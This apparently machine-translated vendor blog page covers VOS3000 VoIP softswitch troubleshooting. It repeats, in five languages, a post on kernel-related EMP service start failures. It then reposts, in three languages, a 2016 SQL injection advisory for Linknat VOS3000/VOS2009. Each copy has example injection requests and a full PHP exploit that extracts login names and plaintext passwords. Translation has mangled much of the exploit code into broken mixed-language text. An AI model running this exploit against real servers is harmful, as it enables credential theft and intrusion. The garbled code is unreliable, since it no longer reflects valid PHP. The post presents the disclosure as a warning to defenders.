Skip to content
  • Home
  • Cheapest VOS3000 Server Rent, VOS3000 Best Trusted Vendor
  • VOS3000 Softswitch
Search
Close

VOS3000

MULTAHOST Blog for VOS3000 Troubleshoot

Tag: VOS3000 Vendor Connections

EMP শুরু VOS3000 সার্ভার SSH-এ ব্যর্থ হয়েছে, কিভাবে সমাধান করতে হবে?

June 7, 2019 king

হ্যালো অল,

# সার্ভিস empd শুরু
কুনশি ইএমপি সেবা শুরু হচ্ছে: [FAILED]

আপনারা অনেকেই ইএমপি-র জন্য আদেশ দেওয়ার পর ইএমপি স্টার্ট ব্যর্থ হয়েছেন, অনেক কারণ আছে, আমি এখন একটি প্রধান বিষয় বর্ণনা করব। VOS3000 Emp লিনাক্সের সকল কার্নেল সংস্করণ সমর্থন করে না। VOS3000 এর জন্য বেশিরভাগ ব্যবহৃত ওএস সেন্টওএস, সেন্টোস 5.11 আর সেন্টোস দ্বারা সমর্থিত নয়, তাই এটি যে কোন ডাটাসেন্টার থেকে পাওয়া কঠিন কিন্তু সম্ভব। সেক্ষেত্রে রেপো ফাইল ঠিক করতে হবে। এছাড়াও সেন্টোস 6.10 বা সেন্টোস 7 এছাড়াও VOS3000 এর অনেক সংস্করণ সমর্থন করেনি। প্রধানত কার্নেল সমস্যার কারণে ইএমপি শুরু হয় না। EMP শুরু ছাড়া আপনি MBX শুরু করতে পারবেন না। সেক্ষেত্রে আপনাকে কার্নেলকে সমর্থিত কার্নেলে নামিয়ে আনতে হবে অথবা সমর্থিত কার্নেল আপগ্রেড করতে হবে। আমি সংযুক্ত ফাইলে EMP সমর্থিত কার্নেল তালিকা এখানে শেয়ার করছি। যাতে আপনি সহজেই আপগ্রেড এবং ডাউনডাউন করতে পারেন।

কার্নেল সংস্করণ আপগ্রেড বা ডাউনগ্রেড করার জন্য আপনি Google এ অনুসন্ধান করতে পারেন, এর জন্য অনেক সহজ ম্যানুয়াল আছে.

EMP সমর্থিত কার্নেল তালিকা

কিছু গুরুত্বপূর্ণ কমান্ড আপনার জানা প্রয়োজন ভোস3000 সঙ্গে কার্নেল ইস্যু জন্য.

ইনস্টল করা সফটওয়্যারতালিকাভুক্ত করতে আপনাকে আদর্শ RPM কমান্ড ব্যবহার করতে হবে। শেল প্রম্পটে নিম্নলিখিত কমান্ড টাইপ করুন:


$ rpm -qa কার্নে
ল আউটপুট: kernel-2.6.18-4.1.15.el5 কার্নেল-2.6.18-8.1.1.el5 k ernel-2.6.18-8.1.10.el5

আপনার যদি আরো সাহায্যের প্রয়োজন হয় তাহলে আমাকে হোয়াটসঅ্যাপ করুন: +৮৮০১৯১১১১৯৯৬৬

فشل EMP ابدأ في خادم VOS3000 SSH، كيفية حل؟

June 7, 2019 king

مرحبا بالجميع ،

# خدمة empd بد
ء بدء خدمة كونشي EMP: [FAILED]

العديد منكم مواجهة قضية EMP ابدأ فشل بعد إعطاء الأمر ل EMP، وهناك سبب كثير، وسوف أصف الآن قضية رئيسية واحدة. VOS3000 لا تدعم EMP جميع إصدارات نواة لينكس. نظام التشغيل المستخدمة في الغالب لVOS3000 هو CentOS، سنتوس 5.11 لم يعد مدعوما من قبل سنتوس، لذلك من الصعب الحصول عليه من أي مركز بيانات ولكن ممكن. تحتاج إلى إصلاح ريبو الملف في هذه الحالة. أيضا سنتاوس 6.10 أو Centos 7 أيضا لا تدعم العديد من الإصدارات من VOS3000. أساسا لا تبدأ emp بسبب مشكلة النواة. دون بدء EMP لا يمكنك بدء MBX. في هذه الحالة لديك لخفض النواة إلى نواة معتمدة أو الحاجة إلى ترقية نواة لدعم واحد. أنا تقاسم EMP قائمة نواة معتمدة هنا في الملف المرفق. حتى تتمكن من الترقية وتقلل بسهولة.

للترقية أو إصدار إصدار Kernel يمكنك البحث في جوجل ، هناك العديد من دليل سهل لذلك.

emp قائمة kernel معتمدة

بعض الأوامر الهامة التي تحتاج إلى معرفتها عن مشكلة النواة مع vos3000.

تحتاج إلى استخدام الأمر دورة في الدقيقة القياسية لقائمة البرامج المثبتة. اكتب الأمر التالي في موجه shell:


$ دورة في الدقيقة
– qa kernelOutput: نواة-2.6.18-4.1.15.el5 نواة 2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

إذا كنت بحاجة إلى مزيد من المساعدة فقط ال whatsapp لي: +880191119966

multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

EMP 启动失败在 VOS3000 服务器 SSH,如何解决 ?

June 7, 2019January 16, 2026 king

EMP 启动失败在 VOS3000 服务器 SSH,如何解决 ?

大家好,

* 服务 empd 启动
启动 kunshi emp 服务: [FAILED]

你们许多人在给出EMP命令后面临EMP启动失败的问题,有很多原因,我现在将描述一个主要问题。 VOS3000 Emp 不支持 Linux 的所有内核版本。 VOS3000 主要用于的 OS 是 CentOS,Centos 5.11 不再受 centos 支持,因此很难从任何数据中心获取,但可能。 在这种情况下, 需要修复存储库文件。 此外, Centos 6.10 或 Centos 7 也不支持 VOS3000 的许多版本。 主要是 emp 由于内核问题而未启动。没有 emp 启动, 你不能启动 Mbx 。 在这种情况下,您必须将内核降级为受支持的内核,或者需要将内核升级到受支持的内核。 我在附加文件中共享 emp 支持的内核列表。 因此,您可以轻松升级和降级。

对于升级或降级内核版本,你可以在谷歌搜索,有很多简单的手册。

emp 支持的内核列表

对于 vos3000 的内核问题,您需要了解一些重要的命令。

您需要使用标准 rpm 命令列出已安装的软件。 在 shell 提示符下键入以下命令:


$ rpm - qa 内核输
出: 内核 – 2.6.18 – 4.15. el5 内核 – 2.6.18 – 8.14.el5 k ernel-2.6.18-8.1.10.el5

如果你需要更多的帮助, 只是什么应用程序我: +880191119966

  • Configuración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORT
  • Portabilidad numérica LRN VOS3000 Proven consulta de carriers EE.UU.
  • Precisión decimal tarifas VOS3000 Accurate configuración FEE_PRECISTION y HOLD_TIME_PRECISION
  • Códigos respuesta SIP CDR VOS3000 Complete Important referencia de 30+ códigos
  • Reemplazo razón fallida VOS3000 Best Strategic configuración personalizada de errores
multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

EMP शुरू VOS3000 सर्वर एसएसएच में विफल रहा है, कैसे हल करने के लिए?

June 7, 2019January 14, 2026 king

EMP शुरू VOS3000 सर्वर एसएसएच में विफल रहा है, कैसे हल करने के लिए?

नमस्ते सभी,

# सेवा empd शुर
ू कुन्शी एम्प सेवा शुरू: [FAILED]

आप में से कई चेहरा मुद्दा EMP शुरू EMP के लिए आदेश देने के बाद विफल रहा है, वहां कई कारण हैं, मैं अब एक प्रमुख मुद्दे का वर्णन करेंगे । VOS3000 Emp लिनक्स के सभी गिरी संस्करणों का समर्थन नहीं करते हैं। ज्यादातर VOS3000 के लिए उपयोग किया जाता है सेंटोस, सेंटोस 5.11 अब सेंटोस द्वारा समर्थित नहीं है, इसलिए इसे किसी भी डेटासेंटर से प्राप्त करना मुश्किल है लेकिन संभव है। उस मामले में रेपो फाइल को ठीक करने की जरूरत है। इसके अलावा सेंटोस 6.10 या सेंटोस 7 ने भी VOS3000 के कई संस्करणों का समर्थन नहीं किया। मुख्य रूप से गिरी मुद्दे के कारण शुरू नहीं किया गया। एम्प स्टार्ट के बिना आप एमबीएक्स शुरू नहीं कर सकते हैं। उस मामले में आप गिरी का समर्थन करने के लिए ढाल या एक समर्थित करने के लिए गिरी को अपग्रेड करने की जरूरत है । मैं संलग्न फ़ाइल में यहां emp समर्थित गिरी सूची साझा कर रहा हूं । तो आप आसानी से अपग्रेड और डाउनग्रेड कर सकते हैं।

अपग्रेड या डाउनग्रेड गिरी वर्जन के लिए आप गूगल में सर्च कर सकते हैं, इसके लिए कई आसान मैनुअल हैं।

एम्प समर्थित गिरी सूची

कुछ महत्वपूर्ण आदेश आप vos3000 के साथ गिरी मुद्दे के लिए पता करने की आवश्यकता है।

स्थापित सॉफ़्टवेयर को सूचीबद्ध करने के लिए आपको मानक आरपीएम कमांड का उपयोग करना होगा। शेल प्रॉम्प्ट पर निम्नलिखित कमांड टाइप करें:


$ rpm-qa kernel
Output: गिरी-2.6.18-4.1.15.el5 गिरी-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

यदि आपको अधिक मदद की जरूरत है तो सिर्फ मुझे व्हाट्सएप करें: +8801911119966

EMP शुरू VOS3000 सर्वर एसएसएच में विफल रहा है, कैसे हल करने के लिए?

June 7, 2019 king

नमस्ते सभी,

# सेवा empd शुर
ू कुन्शी एम्प सेवा शुरू: [FAILED]

आप में से कई चेहरा मुद्दा EMP शुरू EMP के लिए आदेश देने के बाद विफल रहा है, वहां कई कारण हैं, मैं अब एक प्रमुख मुद्दे का वर्णन करेंगे । VOS3000 Emp लिनक्स के सभी गिरी संस्करणों का समर्थन नहीं करते हैं। ज्यादातर VOS3000 के लिए उपयोग किया जाता है सेंटोस, सेंटोस 5.11 अब सेंटोस द्वारा समर्थित नहीं है, इसलिए इसे किसी भी डेटासेंटर से प्राप्त करना मुश्किल है लेकिन संभव है। उस मामले में रेपो फाइल को ठीक करने की जरूरत है। इसके अलावा सेंटोस 6.10 या सेंटोस 7 ने भी VOS3000 के कई संस्करणों का समर्थन नहीं किया। मुख्य रूप से गिरी मुद्दे के कारण शुरू नहीं किया गया। एम्प स्टार्ट के बिना आप एमबीएक्स शुरू नहीं कर सकते हैं। उस मामले में आप गिरी का समर्थन करने के लिए ढाल या एक समर्थित करने के लिए गिरी को अपग्रेड करने की जरूरत है । मैं संलग्न फ़ाइल में यहां emp समर्थित गिरी सूची साझा कर रहा हूं । तो आप आसानी से अपग्रेड और डाउनग्रेड कर सकते हैं।

अपग्रेड या डाउनग्रेड गिरी वर्जन के लिए आप गूगल में सर्च कर सकते हैं, इसके लिए कई आसान मैनुअल हैं।

एम्प समर्थित गिरी सूची

कुछ महत्वपूर्ण आदेश आप vos3000 के साथ गिरी मुद्दे के लिए पता करने की आवश्यकता है।

स्थापित सॉफ़्टवेयर को सूचीबद्ध करने के लिए आपको मानक आरपीएम कमांड का उपयोग करना होगा। शेल प्रॉम्प्ट पर निम्नलिखित कमांड टाइप करें:


$ rpm-qa kernel
Output: गिरी-2.6.18-4.1.15.el5 गिरी-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

यदि आपको अधिक मदद की जरूरत है तो सिर्फ मुझे व्हाट्सएप करें: +8801911119966

EMP Start Failed in VOS3000 Server SSH, How to solve ?

June 7, 2019June 12, 2019 king

Hello All,

# service empd start
Starting kunshi emp service: [FAILED]

Many of you face issue EMP Start Failed after giving the command for EMP, There are many reason, I will Describe now one major issue. VOS3000 Emp do not support all kernel versions of Linux. Mostly used OS for VOS3000 is CentOS, Centos 5.11 is no more supported anymore by centos, so its difficult to get it from any datacenter but possible. Need to Fix Repo file in that case. Also Centos 6.10 or Centos 7 also not supported many versions of VOS3000. Mainly emp not start due to kernel issue. without emp start you can not start MBX. In that case you have to downgrade Kernel to supported kernel or need to upgrade kernel to supported one. I am sharing emp supported kernel list here in attached file. So you can upgrade and downgrade easily.

For Upgrade or downgrade Kernel version you can search in google, there are many easy manual for that.

emp supported kernel list

Some important commands you need to know for kernel issue with vos3000.

You need to use standard rpm command to list installed software. Type the following command at shell prompt:


$ rpm -qa kernel
Output: kernel-2.6.18-4.1.15.el5 kernel-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

If you need more help just whatsapp me: +8801911119966

Cómo VOS3000 Conseguir Hackeado por SQL Inyección Script, evitar la piratería!

June 4, 2019November 22, 2020 king

Inyección SQL Linknat VOS2009/VOS3000


Desde: Osama Khalid <osama ()="" codinghazard="" com="">
Fecha: Jue, 19 May 2016 16:52:54 +0500</osama>


Se encontró una inyección SQL en Linknat VOS3000/VOS2009, un VoIP popular
softswitch, que podría permitir a los atacantes remotos obtener acceso a la
credenciales almacenadas en texto sin formato.

Aplicación: Linknat VOS3000/VOS2009
Versiones afectadas: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL del proveedor: http://www.linknat.com/
Error: SQLi (con privilegios DBA)
Tipo: Remoto
Resolución: Corregido, actualización a 2.1.2.4 o 2.1.6.0 Versión limpia
Referencia: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

El SQLi reportado es ciego basado en el tiempo. Dado que no es un SQLi en banda, el
resultados pueden obtenerse de la salida de la bienvenida.jsp durante el mismo
Sesión.

(1a solicitud)

POST http://target/eng/login.jsp
PARAM loginType-1
        name ' unión seleccione 1,2,@@version,'hola',5,6?
        pase ' O ''' '

(2a solicitud durante la misma sesión)

OBTENGA http://target/eng/welcome.jsp
RESULTADO 0 ' selección de unión
1,2,@@version,'hola',5,6'1'5.0.51a-comunidad''hola'0.00'0.00'

[ EXPLOIT CODE ]<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_[1]one   = isset($argv) ? $argv :[2] "loginna[2]me";
$column_two   = isset($argv) ? $argv : [3]"password[3]";
$table        = isset($argv) ? $argv : "[4]e_user";
[4]$other        = isset($argv) ? $argv : ""[5];

functi[5]on banner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3[HOST]000.php 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php v[HOST]o[COL1]s[COL2]3[TABLE]00[OTHER SQL]0.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) ?
        foreach ( $post como $key > $value)
            $post_items : $key . '=' . urlencode($value);
 []       $post_string á implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data - curl_exec($curl);
    curl_close($curl);
    $data de retorno;
}

consulta de función ($host, $query)
    $data á curl("http://$host/eng/login.jsp";, array(
            "loginType" (> 1,
            "nombre" > "' unión " . $query . "#",
            "pasar" > "' O ''''"
        ), null, true);
    preg_match_all('' Set-Cookie: (.*$matches $data);
    $cookies de implode('; ', $matches);
    $data á curl("http://$host/eng/welcome.j[1]sp";, array(), $cookies, false);
    $parts de explosión ("", recorte($data));

si (cuenta($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    [3]$keys = [4]array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid de n.o s2 ($wid, strlen($v));
    }
    foreach($wi[$k]d as $k ?> [$k]$v)
        $fmt : "%--$v";
        $sep á str_repeat('-', $v);
   [$k] }
    $fmt de la página d[$k]e la casa de la casa de los ' . implode(' ? ', $fmt) . ' |';
    $sep '+-' . implode('-+-', $sep) . '-+';
    $buf á array($sep, vsprintf($fmt, $keys), $sep);
    foreach($data as $row) ?
        $buf : vsprintf($fmt, $row)[];
        $buf á $sep;
    }
    implo[]de de retorno ("n", $buf);
}

banner();
echo "n";
echo "Target: $host-n";
echo "Column #1: $column_one-n";
echo "#2 de columnas: $column_two-n";
echo "Tabla: $table";
echo "Otros: $other";
echo "n";

$results - array();
$count_result á query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other");
si ($count_result) ?
    $count de intval($count_result);
    echo "Found $count rows...

para[0] ($i-0;<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .=[0]"" "=" . hex2bin($result) .
" n";="" }="" else="[1]" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" []==""> hex2bin $i($result), $column_dos
•[0]> hex2bin($result));
    }

if (c[1]ount($results) > 0)
        echo de eco ". ascii_table($results) . "n";
    }
•otra cosa?
    echo "Error al recuperar el recuento de filas";
}

?></$count;>

A partir de 2016 Personas que utilizan algunos productos blandos de inyección sql para hackear VOS3000, Tenemos nuestro propio sistema de seguridad de ese momento, actualizamos nuestro sistema de seguridad demasiado fuerte ahora, mi enfoque de trabajo siempre fue para la seguridad para voip soft-switch. La mayoría de las veces di consejos gratuitos o compartía información tanto como posible sin costo. Todavía hay un montón de cosas sucias corriendo alrededor, así que por favor tenga cuidado siempre y sepa más. De lo contrario, nunca podrás hacer un buen negocio. Ahora en día Las personas que utilizan scripts ocultos o malwares en el software cliente VOS3000 para hackear VOS Server.

Para más ayuda Knock me en whatsapp: +8801911119966 – voy a hacer ayuda a todas las maneras.

कैसे VOS3000 SQL इंजेक्शन स्क्रिप्ट द्वारा काट दिया हो, हैकिंग को रोकने के!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL इंजेक्शन


से: ओसामा खालिद <osama ()="" codinghazard="" com="">त
िथि: Thu, 19 मई २०१६ 16:52:54 + ०५००</osama>


एक एसक्यूएल इंजेक्शन Linknat VOS3000/VOS2009, एक लोकप्रिय वीओआईपी में पाया गया था
सॉफ्टस्विच, जो दूरदराज के हमलावरों को पहुंच प्राप्त करने की अनुमति दे सकता है
सादे पाठ में संग्रहीत साख।

आवेदन: लिंकनट VOS3000/VOS2009
प्रभावित संस्करण: 2.1.1.5, 2.1.1.8, 2.1.2.0
विक्रेता यूआरएल: http://www.linknat.com/
बग: एसक्यूली (डीबीए विशेषाधिकारों के साथ)
प्रकार: रिमोट
रिज़ॉल्यूशन: फिक्स्ड, 2.1.2.4 या 2.1.6.0 स्वच्छ संस्करण में अपग्रेड करें
संदर्भ: वूयून-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi रिपोर्ट समय आधारित अंधा है । चूंकि यह एक इन-बैंड SQLi नहीं है,
परिणाम उसी के दौरान स्वागत के उत्पादन से इकट्ठा किया जा सकता है.jsp
सत्र।

(पहला अनुरोध)

पद http://target/eng/login.jsp
परम लॉगइनटाइप =1
        नाम = ' संघ का चयन 1,2,@@version, 'नमस्ते', 5,6#
        पास =' या ''='

(इसी सत्र के दौरान दूसरा अनुरोध)

http://target/eng/welcome.jsp जाओ
परिणाम 0.' संघ का चयन
1,2,@@version, 'hello', 5,6 #.1.5.0.51a-community.hello.0.00.0.00.

<?php
#
# Linknat [ EXPLOIT CODE ]VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset[1]($argv) ? $argv : "loginname"[2];
$column_[2]two   = isset($argv) ? $argv : "password";
[3]$table   [3]     = isset($argv) ? $argv : "e_user";
$o[4]ther      [4]  = isset($argv) ? $argv : "";

function[5] banner()[5] {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.ph[HOST]p 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vos3000[HOST].[COL1]p[COL2]h[TABLE]p[OTHER SQL] 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        फोरच ($post $key = > $value)
            $post_आइटम = $key । '=' . यूरेनकोड ($value);
        []$post_स्ट्रिंग = फटना ('&', $post_आइटम);
        curl_setopt ($curl, CURLOPT_POST, 1);
        curl_setopt ($curl, CURLOPT_POSTFIELDS, $post_स्ट्रिंग);
    }
    $data = curl_exec ($curl);
    curl_close ($curl);
    $data लौटें;
}

फंक्शन क्वेरी ($host, $query) {
    $data = कर्ल ("http://$host/eng/login.jsp";, सरणी (
            "लॉगिनटाइप" = > 1,
            "नाम" = > "संघ" । $query । "#",
            "पास" = > "' या '='"
        ), अशक्त, सच है);
    preg_match_all ('। सेट-कुकी: (.*);..यू', $data, $matches);
    $cookies = फटना ('; ', $matches);
    $data = कर्ल ("http://$host/eng/welcome.j[1]sp";, सरणी (), $cookies, झूठी);
    $parts = विस्फोट (".., ट्रिम ($data));

यदि (गिनती ($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    $[3]keys = a[4]rray_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = अधिकतम ($wid, स्ट्रेन ($v));
    }
    फोरच ($k [$k]= > $v) के [$k]रूप में $wid {
        $fmt = "%-{$v}s";
        $sep = str_repea[$k]t ('-', $v);
    }
    $fmt[$k] = '। ' . फटना (' । ', $fmt) । ' |';
    $sep = '+-' । फटना ('-+-', $sep) । '-+';
    $buf = सरणी ($sep, वेस्प्रिंट ($fmt, $keys), $sep);
    फोरच ($row के रूप में $data) {
        $buf = vsprintf ($fmt, $row);
        $[]buf = $sep;
    }
    वापसी फटना ("n[]", $buf);
}

बैनर ();
गूंज "n";
गूंज "लक्ष्य: $host  n";
गूंज "कॉलम #1: $column_onen";
गूंज "कॉलम #2: $column_दो n";
गूंज "तालिका: $table n";
गूंज "अन्य: $other n";
गूंज "n";

$results = सरणी ();
$count_result = क्वेरी ($host, "1,2,काउंट (*), 4,5,6 से $table
$other");
यदि ($count_result) {
    $count = intval ($count_result);
    गूंज "पंक्तियों $count पाया...n";

के लिए ($i = [0]0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .=[0]"" "=" . hex2bin($result) .
" n";="" }="" else=[1]"" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_on[]e" ==""> hex2bin ($result), $column_two
[0]=> हेक्स2बिन ($result));
    }

य[1]दि (गिनती ($results) > 0) {
        गूंज "nn" । ascii_table ($results) । "n";
    }
}अन्य {
    गूंज "त्रुटि पुनः प्राप्त पंक्ति गिनती";
}

?></$count;>

2016 से लोग VOS3000 हैक करने के लिए कुछ वर्ग इंजेक्शन सॉफ्ट माल का उपयोग करते हैं, हमारे पास उस समय से हमारी अपनी सुरक्षा प्रणाली है, हमने अपनी सुरक्षा प्रणाली को अपडेट किया है, अब हमने अपनी सुरक्षा प्रणाली को भी मजबूत किया है, मेरा काम ध्यान वीओआईपी सॉफ्ट-स्विच के लिए सुरक्षा के लिए हमेशा था। अधिकांश समय मैंने मुफ्त सलाह दी या जितना संभव हो उतना मुफ्त जानकारी साझा की। फिर भी बहुत सारी गंदी चीजें चल रही हैं, इसलिए कृपया हमेशा सावधान रहें और अधिक जानें। वरना आप कभी भी अच्छा बिजनेस नहीं कर पाएंगे। अब-एक दिन VOS सर्वर हैक करने के लिए VOS3000 क्लाइंट सॉफ्टवेयर में छिपी स्क्रिप्ट या मैलवेयर का उपयोग कर रहे लोग।

अधिक मदद के लिए मुझे whatsapp में दस्तक: + ८८०१९११११९९६६-मैं सभी तरीकों से मदद करेंगे ।

কিভাবে VOS3000 SQL ইনজেকশন স্ক্রিপ্ট দ্বারা হ্যাক করা হয়, হ্যাকিং প্রতিরোধ!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL ইনজেকশন


থেকে: ওসামা খালিদ <osama ()="" codinghazard="" com="
">তারিখ: 19 মে, 2016 16:52:54 +0500</osama>


একটি এসকিউএল ইনজেকশন লিঙ্কনাট VOS3000/VOS2009, একটি জনপ্রিয় ভিওআইপি পাওয়া গেছে
সফটসুইচ, যা দূরবর্তী আক্রমণকারীদের অ্যাক্সেস পেতে অনুমতি দিতে পারে
সরল-পাঠে সংরক্ষিত প্রমাণপত্রাদি।

আবেদন: লিঙ্কনাট VOS3000/VOS2009
সংস্করণ প্রভাবিত: 2.1.1.5, 2.1.1.8, 2.1.2.0
বিক্রেতার ইউআরএল: http://www.linknat.com/
বাগ: SQLi (DBA সুবিধা সহ)
ধরন: দূরবর্তী
রেজোলিউশন: ফিক্সড, আপগ্রেড 2.1.2.4 অথবা 2.1.6.0 পরিষ্কার সংস্করণ
রেফারেন্স: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

এসকিউলি রিপোর্ট করেছে যে সময় ভিত্তিক অন্ধ। যেহেতু এটি একটি ইন-ব্যান্ড SQLI নয়,
ফলাফল স্বাগতম আউটপুট থেকে সংগ্রহ করা যেতে পারে.jsp একই সময়ে
সুসংবদ্ধ।

(১ম অনুরোধ)

পোস্ট http://target/eng/login.jsp
PARAM লগইনটাইপ=1
        name=' ইউনিয়ন নির্বাচন 1,2,@@version,'হ্যালো', 5,6#
        পাস=' অথবা '='

(একই অধিবেশনে ২য় অনুরোধ)

http://target/eng/welcome.jsp
ফলাফল 0|' ইউনিয়ন নির্বাচন
1,2,@@version,'হ্যালো', 5,6#|1|5.0.51a-সম্প্রদায়|হ্যালো|0.00|0.00|

<?php
#
# Linknat VOS2[ EXPLOIT CODE ]009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset($argv) ? [1]$argv : "loginname";
$column_[2]two   = i[2]sset($argv) ? $argv : "password";
$table    [3]    = isse[3]t($argv) ? $argv : "e_user";
$other        [4]= isset($[4]argv) ? $argv : "";

function banner() {
[5]    echo [5]"########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.php 127.0.0.1n";
  [HOST]  echo "php vos3000.php     n";
    echo "php vos3000.php 127.0.0.1 tab[HOST]l[COL1]e[COL2]_[TABLE]s[OTHER SQL]chema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        প্রতিটি ($key => $value হিসাবে $post
            $post আইটেম = $key। '=' . urlencode($value);
        $post স্ট্রিং = ইম[]্প্রোভাইজ করুন('&', $post_আইটেম);
        curl_setopt ($curl, CURLOPT_POST, ১);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post স্ট্রিং);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    $data প্রত্যাবর্তন;
}

ফাংশন কোয়েরি($host, $query) {
    $data = কার্ল ("http://$host/eng/login.jsp";, অ্যারে
            "loginType" => 1,
            "নাম" => "" ইউনিয়ন" । $query । "#",
            "পাস" => "" অথবা "="
        ), শূন্য, সত্য);
    preg_match_all('|' সেট-কুকি: (.*);|U', $data, $matches);
    $cookies = বিস্ফোরিত('; ', $matches);
    $data = কার্ল ("http://$host/eng/welcome.jsp";,[1] অ্যারে(), $cookies, মিথ্যা);
    $parts = বিস্ফোরণ("|", ছাঁটা($data);;

যদি (গণনা($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    $keys = [3]array_key[4]s(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = সর্বোচ্চ ($wid, স্ট্রলেন($v);
    }
    প্রতিটি ($k => $v [$k]হিসাবে $wid)[$k] {
        $fmt = "%-{$v}s";
        $sep = str_repeat('-',', $v);[$k]
    }
    $fmt = '| ' . বি[$k]স্ফোরিত(' | ', $fmt)। ' |';
